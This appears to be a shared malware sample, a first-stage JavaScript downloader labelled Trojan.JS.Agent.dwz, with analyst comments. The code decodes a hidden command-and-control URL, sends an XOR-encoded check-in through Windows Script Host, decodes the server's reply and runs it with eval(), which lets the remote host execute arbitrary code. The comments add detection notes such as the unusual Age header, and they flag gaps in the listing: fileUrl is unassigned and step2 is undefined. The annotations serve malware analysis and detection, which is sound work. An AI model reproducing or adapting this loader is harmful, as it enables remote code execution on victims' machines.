James_inthe_box

Trojan.JS.Agent.dwz

Apr 5th, 2019
  // First-stage configuration. Analyst notes (host names defanged in comments only).
  // `key` is not referenced by any other statement in this listing.
  1. var key = [46, 2, 187, 236, 225, 77, 67, 200, 231, 250];
  2.  
  // getUrl() keeps the odd-index characters and reverses them, so this literal decodes to
  // static.spillpalletonline[.]com/pixel.gif.
  // NOTE(review): the decoded value is stored in `Url`, but the `fileUrl = ...` statement below
  // reads `fileUrl`, which is never assigned in this listing; as pasted, that read would throw.
  // Presumably a rename left over from deobfuscation - confirm against the original sample.
  3. Url = getUrl('/fri4g:.:l3epx6ifpg/pm&o#c4.se/n0i5l.naoktbetl6l:a8p0l9l:i/p0s8.pc4i1t3a7t.s#');
  // Decodes to '507'; initialRequest1() sends it as field 1 of the check-in.
  4. var tid = getUrl('.7m0&5w');
  // Holds the decoded server response: written by decodeContent1(), later passed to eval().
  5. var content1 = '';
  // Header name and value attached to the POST in initialRequest1(). `Age` is normally a
  // response header, so an outbound request carrying `Age: <16 hex characters>` is a usable
  // network-detection feature.
  6. var authHeader = 'Age';
  7. var authKey = getRandHexStr(16);
  // Prepends a random 8-hex-character label, so each run contacts a different subdomain of the
  // same parent host; match on the parent domain and path rather than the full host name.
  8. fileUrl = 'http://' + getRandHexStr(8) + '.' + fileUrl;
  /**
   * Returns a string of `length` characters drawn from [a-f0-9].
   *
   * Callers in this listing use it for the per-run subdomain label, the
   * request-header value and the first check-in field. The characters come
   * from Math.random(), so the value is a nonce, not a secret.
   *
   * @param {number} length - number of characters to produce
   * @returns {string} random lowercase hex string
   */
  function getRandHexStr(length) {
    var alphabet = 'abcdef0123456789';
    var picked = [];
    while (picked.length < length) {
      var slot = Math.floor(Math.random() * alphabet.length);
      picked.push(alphabet.charAt(slot));
    }
    return picked.join('');
  }
  /**
   * Hex-encodes a string, two lowercase hex digits per character.
   *
   * Only the last two hex digits of each character code are kept, so codes
   * above 0xFF are truncated to their low byte.
   *
   * @param {string} str - text to encode
   * @returns {string} hex string of length 2 * str.length
   */
  function a2hex(str) {
    var encoded = '';
    var total = str.length;
    var pos = 0;
    while (pos < total) {
      // Left-pad with zeros, then keep exactly the last two digits.
      var padded = '00' + str.charCodeAt(pos).toString(16);
      encoded += padded.slice(-2);
      pos += 1;
    }
    return encoded;
  }
  /**
   * String de-obfuscator: drops every even-index character (the filler),
   * keeps the odd-index ones, and returns them in reverse order.
   *
   * Running the same transform over the string literals in this script
   * recovers the hidden host/path and campaign id without executing it.
   *
   * @param {string} url - obfuscated literal
   * @returns {string} decoded text
   */
  function getUrl(url) {
    var chars = url.split('');
    var kept = [];
    for (var idx = 1; idx < chars.length; idx += 2) {
      kept.push(chars[idx]);
    }
    kept.reverse();
    return kept.join('');
  }
  /**
   * Unpacks the server response into the global `content1`.
   *
   * Layout read from `str` (all hex text): the first 2 characters are
   * skipped, the next 6 are the body length in bytes, and the following
   * length * 2 characters are the body handed to decPayload().
   *
   * @param {string} str - raw response text
   */
  function decodeContent1(str) {
    var offset = 2;
    var lengthField = str.substr(offset, 6);
    var content1_length = parseInt(lengthField, 16);
    // Two hex characters per byte, hence the doubling.
    var hexBody = str.substr(offset + 6, content1_length * 2);
    content1 = decPayload(hexBody);
  }
  /**
   * Decodes a hex-encoded, repeating-key XOR blob.
   *
   * Byte layout after hex decoding: [key length N][N key bytes][body].
   * Each body byte is XORed with key[i % N] and turned into one character.
   * The key is carried inside the blob itself, so this is obfuscation only:
   * anyone holding a captured response can decode it offline.
   *
   * @param {string} str - hex text
   * @returns {string} decoded text
   */
  function decPayload(str) {
    var bytes = [];
    var pos;
    for (pos = 0; pos < str.length; pos += 2) {
      bytes.push(parseInt(str.substr(pos, 2), 16));
    }
    var keyEnd = bytes[0] + 1;
    var key = bytes.slice(1, keyEnd);
    var body = bytes.slice(keyEnd);
    var plain = [];
    for (pos = 0; pos < body.length; pos++) {
      plain.push(String.fromCharCode(body[pos] ^ key[pos % key.length]));
    }
    return plain.join('');
  }
  /**
   * Encodes the outbound check-in string.
   *
   * Every character is XORed with one random key value (0-255). The result
   * is framed as [random filler character][key character][masked text] and
   * hex-encoded with a2hex(). Because the key is the second byte of the
   * output, a captured request body can be decoded without the script.
   *
   * @param {string} str - plain query string
   * @returns {string} hex text, 2 * (str.length + 2) characters
   */
  function encStr(str) {
    var key = getRandomInt(0, 255);
    var chars = str.split('');
    var masked = '';
    for (var n = 0; n < chars.length; n++) {
      masked += String.fromCharCode(chars[n].charCodeAt(0) ^ key);
    }
    // The filler value is drawn after the masking pass, as in the original.
    var extra_char = getRandomInt(0, 255);
    var framed = String.fromCharCode(extra_char, key) + masked;
    return a2hex(framed);
  }
  /**
   * Returns a random integer between min and max, both inclusive,
   * derived from Math.random().
   *
   * @param {number} min - lower bound
   * @param {number} max - upper bound
   * @returns {number} integer in [min, max]
   */
  function getRandomInt(min, max) {
    var span = max - min + 1;
    var step = Math.floor(Math.random() * span);
    return step + min;
  }
  // Sends the first check-in to fileUrl and returns the response text on HTTP 200,
  // or false once both attempts are used up.
  // Analyst notes:
  //  - Depends on Windows Script Host objects: ActiveXObject('MSXML2.XMLHTTP') and WScript.Sleep.
  //  - Request shape: POST, Content-type application/x-www-form-urlencoded, body 'a=' followed
  //    only by hex characters (the output of encStr), plus the authHeader/authKey header.
  //  - Both catch blocks are empty, so encoding and network errors are swallowed silently.
  80. function initialRequest1() {
  // Check-in fields by index: 0 = 8 random hex characters, 1 = tid, 2 = current time in ms.
  81. var req = [];
  82. req.push(getRandHexStr(8));
  83. req.push(tid);
  84. req.push(+new Date());
  85. var q = '';
  86. try {
  // Builds '0=<v>&1=<v>&2=<v>&' (trailing '&' included), then XOR/hex-encodes it.
  87. for (var i = 0; i < req.length; i++) {
  88. q += i + '=' + encodeURIComponent('' + req[i]) + '&';
  89. }
  90. q = encStr(q);
  91. } catch (error) {
  // If encoding throws, q keeps whatever was built so far and is sent unencoded.
  92. }
  93. var xmlHttp;
  94. var attempts = 2;
  95. var timeout = 3 * 1000;
  96. for (var i = 0; i < attempts; i++) {
  97. try {
  98. xmlHttp = new ActiveXObject('MSXML2.XMLHTTP');
  // Third argument false = synchronous request; the script blocks until the server answers.
  99. xmlHttp.open('POST', fileUrl, false);
  100. xmlHttp.setRequestHeader(authHeader, authKey);
  101. xmlHttp.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
  102. xmlHttp.send('a=' + q);
  103. if (xmlHttp.status == 200) {
  104. return xmlHttp.responseText;
  105. } else {
  106. }
  // Reached only on a non-200 status; an exception skips the 3-second pause and retries at once.
  107. WScript.Sleep(timeout);
  108. } catch (error) {
  109. }
  110. }
  111. return false;
  112. }
  // Entry point: fetch the server response, decode it, execute it.
  113. var data1 = initialRequest1();
  // Any response other than false, '0' or '' is treated as a payload.
  114. if (data1 !== false && data1 != '0' && data1 != '') {
  115. decodeContent1(data1);
  // SECURITY: eval() runs server-supplied text as code inside the script host. Nothing in this
  // listing authenticates or integrity-checks the response, and the XOR key travels inside the
  // response itself (see decPayload), so whoever answers for the contacted host chooses what runs.
  // The behaviour of the next stage therefore cannot be read from this file; it has to be
  // recovered from a captured response.
  116. eval(content1);
  // step2 is not defined in this listing; presumably the evaluated payload defines it - confirm
  // from a captured response.
  117. if (typeof step2 == 'function') {
  118. step2();
  119. }
  120. }